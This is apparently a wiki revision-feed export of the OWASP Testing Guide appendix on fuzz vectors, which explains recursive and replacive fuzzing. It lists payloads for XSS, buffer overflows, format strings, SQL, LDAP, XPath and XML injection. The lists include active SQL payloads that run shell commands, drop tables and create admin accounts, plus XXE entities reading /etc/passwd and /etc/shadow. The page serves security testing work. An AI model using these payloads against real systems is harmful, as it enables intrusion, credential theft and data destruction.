 &amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows and Format String Errors ===&lt;br /&gt;
&lt;br /&gt;
==== Buffer Overflows (BFO) ====&lt;br /&gt;
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.&lt;br /&gt;
&lt;br /&gt;
For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Format String Errors (FSE) ====&lt;br /&gt;
&lt;br /&gt;
Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.&lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%p%x%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;.1024d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If an attacker can cause the program to perform such a memory allocation, the program can be potentially vulnerabie to a buffer overflow attack.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.&lt;br /&gt;
&lt;br /&gt;
For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active).&lt;br /&gt;
&lt;br /&gt;
* Passive SQL Injection&lt;br /&gt;
* Active SQL Injection&lt;br /&gt;
&lt;br /&gt;
Active SQL Injection statements can have a detrimental effect on the underllying database if successfully executed.&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;||6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||'6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(||6)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt; &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; &lt;br /&gt;
 @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) &lt;br /&gt;
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;!&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%28&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%26&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%21&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(mail=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28mail%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(objectclass=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28objectclass%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+''='&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+1=1+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;/&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;@*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;count(/child::node())&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+name()='username'+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Injection ===&lt;br /&gt;
&lt;br /&gt;
Details on XML Injection here: [[XML_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('gotcha');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foof&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file://c:/boot.ini&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14337</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14337"/>
				<updated>2006-12-13T23:51:52Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Integer Overflows (INT) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replacive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replacive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
For details on XSS: [[Cross_site_scripting_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;&lt;br /&gt;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
